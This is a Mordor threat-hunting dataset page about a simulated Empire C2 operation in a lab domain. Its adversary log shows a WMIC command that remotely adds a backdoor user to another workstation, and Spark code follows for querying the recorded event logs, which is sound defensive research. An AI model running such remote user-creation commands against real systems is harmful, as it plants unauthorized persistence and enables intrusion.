Empire Remote WMIC Add User

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/09/14

Modification Date

2020/09/22

Tactics

[‘TA0002’, ‘TA0008’]

Techniques

[‘T1047’]

Tags

[‘WMI IWbemServices ExecMethod’, ‘User Backdoor’]

Dataset Description

This dataset represents an adversary remotely executing code via WMI to ad a backdoor user on the target system. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

shell

Adversary View

(Empire: agents) > 
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent 6Z78CY25 checked in
[+] Initial agent 6Z78CY25 from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to 6Z78CY25 at 172.18.39.5
agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
KFL6CMNZ ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         7584   5/0.0    2020-09-14 11:33:59  http            
YGBLW8EM ps 172.18.39.5     WORKSTATION5      *THESHIRE\wardog        powershell         8924   5/0.0    2020-09-14 11:40:53  http            
UBCKLYFA ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5412   5/0.0    2020-09-14 11:57:16  http            

6Z78CY25 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         9564   5/0.0    2020-09-14 12:02:08  http            

(Empire: agents) > interact 6Z78CY25
(Empire: 6Z78CY25) > 
(Empire: 6Z78CY25) > shell wmic /node:WORKSTATION6 process call create "net user /add backdoor pa$$w0rd1"
[*] Tasked 6Z78CY25 to run TASK_SHELL
[*] Agent 6Z78CY25 tasked with task ID 1
(Empire: 6Z78CY25) > 
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
  ProcessId = 7768;
  ReturnValue = 0;
};

..Command execution completed.

(Empire: 6Z78CY25) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Security                                |5447   |1430 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |1426 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |1361 |
|WORKSTATION5.theshire.local|Security                                |5158   |1337 |
|WORKSTATION5.theshire.local|Security                                |5154   |1297 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |1139 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |1115 |
|WORKSTATION5.theshire.local|Security                                |4658   |534  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |276  |
|WORKSTATION5.theshire.local|Security                                |4656   |270  |
|WORKSTATION5.theshire.local|Security                                |4690   |264  |
|WORKSTATION5.theshire.local|Security                                |4663   |257  |
|WORKSTATION5.theshire.local|Security                                |4703   |120  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |113  |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |108  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |11     |95   |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |90   |
|WORKSTATION5.theshire.local|Security                                |5156   |84   |
|WORKSTATION6.theshire.local|Security                                |4658   |67   |
|MORDORDC.theshire.local    |Security                                |5156   |54   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows